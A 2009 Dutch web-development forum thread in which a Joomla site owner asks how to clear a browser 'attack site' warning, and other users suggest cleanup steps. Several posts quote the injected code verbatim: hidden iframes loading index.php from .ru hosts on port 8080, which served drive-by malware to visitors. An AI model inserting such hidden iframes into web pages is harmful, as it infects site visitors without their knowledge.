Aanvalssite

Overzicht Reageren

Sponsored by: Vacatures door Monsterboard

Senior Front end developer Digital Agency

Functie Jij als Front end developer komt te werken in een van de 8 multidisciplinaire teams binnen de organisatie. Deze teams werken op basis van Scrum agile in 2 wekelijkse sprints. De grootte van de teams varieert van 9-14 collega’s en bestaan altijd uit één of meerdere project managers en een project manager. Samen met je team werk je aan verschillende projecten voor uiteenlopende klanten zoals grote multinationals tot het kleine mkb. De stack waarmee gewerkt wordt is voornamelijk Javascript, ES6, Es.next, HTML, CSS, React.js en Node.js. Wat deze organisatie onderscheid is dat ze echt langdurige partnerships aangaan met hun

Bekijk vacature »

Front end developer React

Functie Wij zijn van origine een wordpress bureau, maar sinds 2006 zijn wij dit wel redelijk ontgroeid. Naar mate de jaren verstreken zijn we gegroeid in omvang, maar ook in de complexiteit van opdrachten waarin wij onze klanten kunnen bedienen. Momenteel bestaat onze organisatie uit 4 front end developers, 12 back end developer 3 projectmanagers en een 2 koppig management. Wij zijn een hele informele, bijna familiaire organisatie. Geen strak pak of overhemd, nee gewoon dragen waar jij je prettig bij voelt. De gemiddelde leeftijd ligt tussen de 25 en 30 en wij doen er veel aan om onze hechte

Bekijk vacature »

Back-End Developer in Laravel / PHP

Functie omschrijving Wij zijn op zoek naar een Medior PHP Laravel Developer voor een gaaf bedrijf in de omgeving van Amsterdam! Voor een enthousiast team die zich graag bezig houdt met softwareontwikkeling zijn wij op zoek naar versterking. Je werkt in een klein ontwikkelteam en bent zeer betrokken bij alle aspecten van de softwareoplossingen. Van het ontwerpen tot de oplevering. Binnen deze functie ga je aan de slag met het aanpassen, verbeteren en vernieuwen van de logistieke oplossingen. Je krijgt veel te maken met koppelingen naar systemen en de verzoeken van de klant. Je komt terecht in een team, waarbij

Bekijk vacature »

Junior/medior Back end developer PHP, Laravel

Functie Jij als ontwikkelaar komt te werken in een team bestaande uit 4 back end programmeurs, 2 vormgevers/ Front end developers en een online marketeer. Qua persoonlijkheden is het team erg gevarieerd van sportfanaten tot gameliefhebbers en Golfers. Een ding heeft iedereen hier gemeen; Passie voor goede code. In jouw rol zul je voor veel van je tijd je bezig houden met het ontwikkelen van maatwerk features en applicaties. Daarnaast hebben wij op aanvraag ook wel eens een website of onderhoudsklusje, die opgepakt moet worden en hier ben jij ook niet vies van. Jij als full stack developer zult dus

Bekijk vacature »

Software developer (Python)

Functie Je komt te werken in het IT-team bestaande uit de Lead developer en 4 (medior/senior) developers. Gezamenlijk werken jullie aan de verbetering en uitbreiding van de software. Binnen het development team is er veel vrijheid en zelfstandigheid, zonder dat ze hiermee afdoen aan de kwaliteit. Zo hebben ze elke ochtend een korte stand-up (10:00 uur) en houden ze zo nu en dan pair-programming sessies. Ook is er een hele professionele ontwikkelcyclus waarbij code altijd eerst door een collega wordt getest voordat het naar deployement gaat. Je hebt in je werk oog voor kwaliteit, risico’s en het klantbelang. Communicatie met

Bekijk vacature »

C# Developer

Functie omschrijving Voor een softwarebedrijf in de omgeving van Veghel zijn we op zoek naar een C# developer. Word jij blij van ontwikkelen in C# en .NET? Lees dan snel verder! Jouw werkzaamheden zullen er als volgt uit gaan zien: Door middel van ASP.NET, MVC Framework en C# ga je webshops, websites en webapplicaties ontwikkelen. Je zorgt voor de optimalisatie van bestaande software en de automatisering van bedrijfsprocessen. Op basis van de wensen van de klant ga je samen met je collega's ga je op zoek naar de juiste oplossingen en je gaat dit uitwerken tot een mooi eindproduct. Bedrijfsprofiel

Bekijk vacature »

Back end developer Python, PHP

Functie Jij als full stack ontwikkelaar zult komen te werken samen met 1 PHP ontwikkelaar een PO en een flexibele schil aan ontwikkelaars . Samen ga je ervoor zorgen dat de huidige producten doorontwikkeld worden. De marketplace is geschreven in PHP Laravel en in de front end React. De roostersoftware is ontwikkeld in Python in combinatie met React in de front end. Jij zult voornamelijk (lees 75%) werken aan de roostersoftware. Momenteel ligt de uitdaging in het feit dat de roostersoftware breder schaalbaar moet worden zodat het voor meerdere flexwerkers ingezet kan worden. Verder willen ze financiële koppelingen gaan maken

Bekijk vacature »

Informeel bureau zoekt Senior PHP developer

Functie Als senior PHP developer neem je het voortouw in ontwikkeltrajecten en ben je in staat werk uit te leggen aan collega’s om zo je kennis met hen te delen. Je deinst niet terug voor ingewikkelde projecten. Deze zie jij alleen maar als uit uitdaging. Je werkt doorlopend aan klantcases (en hierdoor je klant echt leert kennen), maar toch ben je afwisselend bezig. Dit alles in een vrije en ontspannen werksfeer, met een team van gelijkgestemde. Binnen de development teams werken ze met o.a. PHP, Laravel, React, Node, Elastic, Amazon AWS, JIRA, Solid, Domain-driven-design, Doctrine, Redis, docker, Kubernetes, CI, PHP

Bekijk vacature »

Java developer

Als Java Developer bij Sogeti ben je onderdeel van onze toonaangevende community die bestaat uit ruim 100 gepassioneerde professionals. In teamverband lever je mooie prestaties. Daarmee draag je aan bij de meerwaarde die wij leveren aan onze klanten. Geen werkdag is hetzelfde, je bent voortdurend bezig met het oplossen van allerlei complexe vraagstukken binnen bedrijfskritische systemen. Een voorbeeld hiervan is een cliënt-volgsysteem bij Reclassering Nederland. Andere klanten waar wij onder andere voor werken: KPN, Philips, Nationale-Nederlanden, Kamer van Koophandel, ABN AMRO, Bovemij, Arval en de Politie. Werken bij Sogeti Nieuwe ontwikkelingen volgen we op de voet en delen we binnen de

Bekijk vacature »

Full stack developer

Functie Binnen een ontzettend stimulerende werkomgeving kom jij te werken in een software team van 14 developers. Met ontzettend stimulerend bedoel ik een modern pand, wat voorzien is van alle nodige soft- en hardware, zodat jij jouw werk goed kan uitvoeren. Daarnaast zitten ze in een bos, waardoor je in een groene omgeving rustig kunt werken. Het team bestaat uit front end, back end en full stack developers. Jij krijgt dus de keuze hier waar jij jezelf het liefst op zou richten, maar de voorkeur gaat uit naar back end. Er wordt hier Scrum (agile) gewerkt in multidisciplinaire teams met

Bekijk vacature »

.NET Developer Azure

Dit ga je doen Het ontwerpen en bouwen van diverse applicaties (C#, ASP.NET, MVC); Het ontwikkelen van Webservices (WCF); Het meewerken aan de transitie naar Azure; Het samenwerken met collega's binnen een Scrumteam en meedenken over de User Stories; Het bouwen van unittesten; Meedenken over nieuwe tooling, ontwikkelingen en technologieën in de markt. Hier ga je werken Je komt te werken bij een organisatie die verantwoordelijk is voor de ontwikkeling van verschillende portalen. Deze portalen worden gebruikt door diverse partijen en jouw taak is om ervoor te zorgen dat deze optimaal functioneren. Je wordt onderdeel van een Scrumteam en werkt

Bekijk vacature »

Front end developer

Functie Jij als front end developer gaat werken binnen de teams van onze klant, uiteraard met alle moderne technieken. Opdrachten worden echt gericht op jouw leerdoelen en jouw behoeftes. Wij hebben een omgeving gecreëerd waarin je echt jezelf kan zijn en waar echt gekeken wordt naar jouw voorkeuren. Maak je een fout? Geen probleem, leer ervan en dan ga weer door. Door de variëteit aan werk kun je in verschillende omgevingen een kijkje nemen en dus jezelf snel ontwikkelen. Eisen Je bent communicatief vaardig en houdt van een dynamische omgeving Je hebt HBO werk- en denkniveau Je hebt gedegen kennis

Bekijk vacature »

Software Developer C++ en Perl

Ben je een slimme en enthousiaste universitair opgeleide bèta die graag bij een relatief klein softwarebedrijf wil werken waar de sfeer goed is en eigen inbreng gewaardeerd wordt? Wij, IntelliMagic in Leiden, ontwikkelen technisch hoogwaardige software op het gebied van IT infrastructuur performance analytics. Het type software zorgt voor intellectueel interessante uitdagingen. We ontwerpen de producten zelf en verkopen deze als off-the-shelf software aan grote bedrijven in Europa en de VS. Wij zoeken een ervaren C++ software engineer met kennis van Perl voor een van onze ontwikkelteams. Werkzaamheden Samen met de andere ontwikkelaars specificeren, ontwerpen en implementeren van nieuwe functionaliteit

Bekijk vacature »

Programmeur / Developer

Voor een familiebedrijf in Doetinchem, actief in de machinebouw voor de food-sector, zijn wij op zoek naar een programmeur / developer. In deze functie ben je werkzaam in een team van 5 medewerkers. Je werkzaamheden bestaan onder andere uit het verhelderen van requirements vanuit de opdrachtgever, de klant en de afdeling ontwikkeling. Je verricht haalbaarheidsstudies en werkt specificaties uit die je afstemt met de opdrachtgever. Je ontwerpt design in software en stemt af met je collega's. De huidige vision-systemen zijn geschreven in C software, welke draait op een CUDA platform. Je schrijft en codeert software en zal gaan testdraaien. Tot

Bekijk vacature »

WordPress & Azure Developer

Dit ga je doen Zowel front- als back-end development aan de online website omgeving; Het up-to-date houden van alle WordPress-sites; Koppelingen maken tussen applicaties; Meedenken en adviseren over verbeteringen; Development door middel van WordPress, Javascript, HTML en CSS; Werken binnen Scrum/Agile team. Hier ga je werken Voor een grote overheidsinstelling in Den Haag zijn wij opzoek naar een WordPress developer, met kennis en ervaring op het gebied van Azure. De organisatie zit in een grote transitie waarbij de gehele website/online omgeving vernieuwd zal gaan worden. Binnen dit Scrum/Agile team ben je verantwoordelijk voor deze grote migratie/ombouw van de omgeving. De

Bekijk vacature »

Pagina: 1 2 volgende »

JanWillem BlaBla

JanWillem BlaBla

12/07/2009 12:30:00
Quote Anchor link
als ik naar mijn site ga met firefox krijg ik een melding van gerapporteerde aanvalssite, waarschijnlijk krijgen andere bezoekers dit dus ook, hoe krijg ik dit voor iedereen weg?

De site: http://www.vvhunsingo.nl/
 
PHP hulp

PHP hulp

06/05/2024 01:30:04
 
Jan Koehoorn

Jan Koehoorn

12/07/2009 12:32:00
Quote Anchor link
Google heeft je site als 'verdacht' aangemerkt. Heb je iets geks uitgehaald ermee?
 
JanWillem BlaBla

JanWillem BlaBla

12/07/2009 12:36:00
Quote Anchor link
het is dus een joomla site en ik had deze regel
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
<iframe src="http://u9i.ru:8080/index.php" width=173 height=131 style="visibility: hidden"></iframe>

weggehaald omdat ik anders een foutmelding kreeg:
Parse error: syntax error, unexpected '<' in /var/www/vhosts/vvhunsingo.nl/httpdocs/index.php on line 90
 
Timen kut

Timen kut

12/07/2009 12:39:00
Quote Anchor link
http://blog.combell.com/2009/06/21/combell-tech-opgelet-voor-hackers-via-iframe-injection/

i frame injection.. heb ik ook gehad.. Is heel irritant. En als je eenmaal geinfecteerd bent, kan het dus ook overschieten naar andere FTP's waar je op inlogt, dus ook op die van klanten!

edit: Google recommends:http://www.stopbadware.org/home/security
Gewijzigd op 01/01/1970 01:00:00 door Timen kut
 
JanWillem BlaBla

JanWillem BlaBla

12/07/2009 12:51:00
Quote Anchor link
er staat:
Gebruik uw virusscanner om het virus te neutraliseren

Hoe doe ik dit?
 
Timen kut

Timen kut

12/07/2009 12:52:00
Quote Anchor link
Je virus scannen gebruiken om het virus te neutraliseren meestal....

Het virus staat namelijk LOKAAL en niet alleen op je server..

Wat ik heb gedaan is : backup maken van mn hele FTP, FTP HELEMAAL leeggegooid, daarna Adaware en avast scans gedaan, en dan alles weer op de FTP gezet...
 
Midas

Midas

12/07/2009 14:44:00
Quote Anchor link
Volgens mij is die .ru site inmiddels offline.
 
Naam Loos

Naam Loos

12/07/2009 14:58:00
Quote Anchor link
Midas schreef op 12.07.2009 14:44:
Volgens mij is die .ru site inmiddels offline.


Bij mij is die nog steeds online hoor... En wat het vreemde is dat McAfee SiteAdvisor hem ook nog groen ziet??..
 
Midas

Midas

12/07/2009 15:00:00
Quote Anchor link
Bramboos schreef op 12.07.2009 14:58:
Midas schreef op 12.07.2009 14:44:
Volgens mij is die .ru site inmiddels offline.


Bij mij is die nog steeds online hoor... En wat het vreemde is dat McAfee SiteAdvisor hem ook nog groen ziet??..
Hij is ook wel online, alleen je wordt doorgeschakeld naar de host.
 
JanWillem BlaBla

JanWillem BlaBla

12/07/2009 17:00:00
Quote Anchor link
ik heb mn site gescand met Kaspersky maar hij vind niets, wat nu?

Als ik na de melding van aanvalssite verder klik naar mn site, zie ik dat hij er ook niet meer normaal uitziet
 
JanWillem BlaBla

JanWillem BlaBla

12/07/2009 19:01:00
Quote Anchor link
in ieder index bestand op mn site staat nu zo'n regel:
<iframe src="http://u6c.ru:8080/index.php" width=198 height=125 style="visibility: hidden"></iframe>

Is er ook een manier om dit snel te verwijderen?aangezien het er meer dan 200
Gewijzigd op 01/01/1970 01:00:00 door JanWillem BlaBla
 
Roeltje M

Roeltje M

12/07/2009 20:00:00
Quote Anchor link
Alles uploaden, met dreamweaver zoeken/vervangen op map: (de hoofdmap) en dan dat stukje vervangen in niets. Tadaa :)
 
Afra ca

Afra ca

12/07/2009 20:32:00
Quote Anchor link
notepad++ . search, en dan tabblad kan je alles in bestanden in een map vervangen of deleten.
 
Wouter De Schuyter

Wouter De Schuyter

12/07/2009 20:56:00
Quote Anchor link
Jan Koehoorn schreef op 12.07.2009 12:32:
Google heeft je site als 'verdacht' aangemerkt. Heb je iets geks uitgehaald ermee?

Wat is de huidige status van vvhunsingo.nl?

Deze site is als verdacht aangemerkt - het bezoeken van deze site kan uw computer beschadigen.

Een deel van deze site is in de afgelopen 90 dagen 1 keer aangemerkt wegens verdachte activiteiten.

Wat is er gebeurd toen Google deze site bezocht?

Van de 10 pagina's die we in de afgelopen 90 dagen op de site hebben getest, hebben 5 pagina('s) zonder de toestemming van de gebruiker schadelijke software gedownload en geïnstalleerd. De vorige keer dat Google deze site bezocht, was op 2009-07-12. De vorige keer dat verdachte inhoud op deze site werd aangetroffen, was op 2009-07-11.

Schadelijke software wordt op 1 domein(en) gehost, waaronder a3l.ru/.

This site was hosted on 1 network(s) including AS31477 (DUOCAST).

Heeft deze site gefungeerd als een tussenschakel en geleid tot verdere verspreiding van malware?

Het lijkt erop dat vvhunsingo.nl in de afgelopen 90 dagen niet heeft gefunctioneerd als tussenschakel voor de infectie van sites.



JanWillem117 schreef op 12.07.2009 19:01:
in ieder index bestand op mn site staat nu zo'n regel:
<iframe src="http://u6c.ru:8080/index.php" width=198 height=125 style="visibility: hidden"></iframe>

Is er ook een manier om dit snel te verwijderen?aangezien het er meer dan 200

Actual Search And Replace! Gebruik ik vaak..
Gewijzigd op 01/01/1970 01:00:00 door Wouter De Schuyter
 
JanWillem BlaBla

JanWillem BlaBla

12/07/2009 21:00:00
Quote Anchor link
Afra schreef op 12.07.2009 20:32:
notepad++ . search, en dan tabblad kan je alles in bestanden in een map vervangen of deleten.


Als ik dat probeer spoort hij wel al die bestanden op maar kan ik het niet wijzigen, dan krijg ik het zo:
http://img144.imagevenue.com/img.php?image=25245_notepad67_122_872lo.jpg
 
Roel -

Roel -

12/07/2009 21:53:00
Quote Anchor link
Ik heb er pas nog last van gehad, een week geleden ofzo. Je moet ook op je error pagina's letten, hij infecteert namelijk bestanden met "index" en je error pagina's.

Diagnostische pagina voor vvhunsingo.nl - Google
 
Afra ca

Afra ca

12/07/2009 22:01:00
Quote Anchor link
JanWillem117 schreef op 12.07.2009 21:00:
Afra schreef op 12.07.2009 20:32:
notepad++ . search, en dan tabblad kan je alles in bestanden in een map vervangen of deleten.


Als ik dat probeer spoort hij wel al die bestanden op maar kan ik het niet wijzigen, dan krijg ik het zo:
http://img144.imagevenue.com/img.php?image=25245_notepad67_122_872lo.jpg


Gebruik versie 5.4.3 van notepad++ (5.4.4 gaf wat vervelende problemen in windows 7 bij mij) en je kan prima search + replace doen:

http://img339.imageshack.us/img339/4296/capturej.png
 
Filip Smets

Filip Smets

12/07/2009 23:26:00
Quote Anchor link
Database Error: Unable to connect to the database:Could not connect to MySQL

Meer krijg ik niet te zien hoor.
 
JanWillem BlaBla

JanWillem BlaBla

12/07/2009 23:33:00
Quote Anchor link
Dat is nu weer opgelost maar in Firefox ziet de site er bij mij niet uit zoals het hoort en in Opera wel.(Ook in IE ziet het er bij mij normaal uit)

Hoe is dit bij jullie?
Gewijzigd op 01/01/1970 01:00:00 door JanWillem BlaBla
 
- SanThe -

- SanThe -

13/07/2009 08:05:00
Quote Anchor link
Bij het openen van bovenstaande link liep mijn computer geheel vast.
 
JanWillem BlaBla

JanWillem BlaBla

13/07/2009 19:18:00
Quote Anchor link
Als ik nu naar mn site ga in IE krijg ik een melding dat Adobe Acrobat wil openen, hoe kan dat? Ook krijg ik een melding van een virus, ik had mn site helemaal gescand
 

Pagina: 1 2 volgende »



Overzicht Reageren

 
 

Om de gebruiksvriendelijkheid van onze website en diensten te optimaliseren maken wij gebruik van cookies. Deze cookies gebruiken wij voor functionaliteiten, analytische gegevens en marketing doeleinden. U vindt meer informatie in onze privacy statement.